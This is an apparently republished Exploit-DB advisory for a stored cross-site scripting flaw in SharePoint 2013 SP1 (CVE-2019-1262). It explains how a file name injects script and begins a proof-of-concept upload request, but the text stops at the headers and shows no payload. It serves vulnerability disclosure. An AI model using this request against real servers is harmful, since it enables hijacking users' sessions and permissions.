Microsoft SharePoint 2013 SP1 – ‘DestinationFolder’ Persistant Cross-Site Scripting

Exploit Database
125 阅读

作者： Davide Cioccia

日期： 2019-09-25
类别：
- webapps
平台：
- aspx
来源：https://www.exploit-db.com/exploits/47417/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting

# Author: Davide Cioccia

# Discovery Date: 2019-09-25

# Vendor Homepage: https://www.microsoft.com

# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1

# Tested Version: SP1

# Tested on: Microsoft Windows Server 2016

# CVE: CVE-2019-1262

# Advisory ID: ZSL-2019-5533

# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php

# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262

Vendor: Microsoft Corporation

Product web page: https://www.microsoft.com

Affected version: 2013 SP1

Summary: SharePoint is a web-based collaborative platform that

integrates with Microsoft Office. Launched in 2001, SharePoint

is primarily sold as a document management and storage system,

but the product is highly configurable and usage varies substantially

among organizations.

Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft

SharePoint Server does not properly sanitize a specially crafted web

request to an affected SharePoint server. An authenticated attacker

could exploit the vulnerability by sending a specially crafted request

to an affected SharePoint server. The attacker who successfully exploited

the vulnerability could then perform cross-site scripting attacks on

affected systems and run script in the security context of the current

user. The attacks could allow the attacker to read content that the

attacker is not authorized to read, use the victim's identity to take

actions on the SharePoint site on behalf of the user, such as change

permissions and delete content, and inject malicious content in the

browser of the user.

Sharepoint 2013 SP1 allows users to upload files to the platform, but

does not correctly sanitize the filename when the files are listed. An

authenticated user that has the rights to upload files to the SharePoint

platform, is able to exploit a Stored Cross-Site Scripting vulnerability

in the filename. The filename is reflected in the attribute 'aria-label'

of the following HTML tag.

# PoC request:

POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1

Host: vulnerable_sharepoint_2013

Connection: close

Content-Length: 31337

Cache-Control: max-age=0

Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==

Origin: https://vulnerable_sharepoint_2013.tld

Upgrade-Insecure-Requests: 1

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36

Sec-Fetch-Mode: nested-navigate

Sec-Fetch-User: ?1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

Sec-Fetch-Site: same-origin

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6

Cookie: ...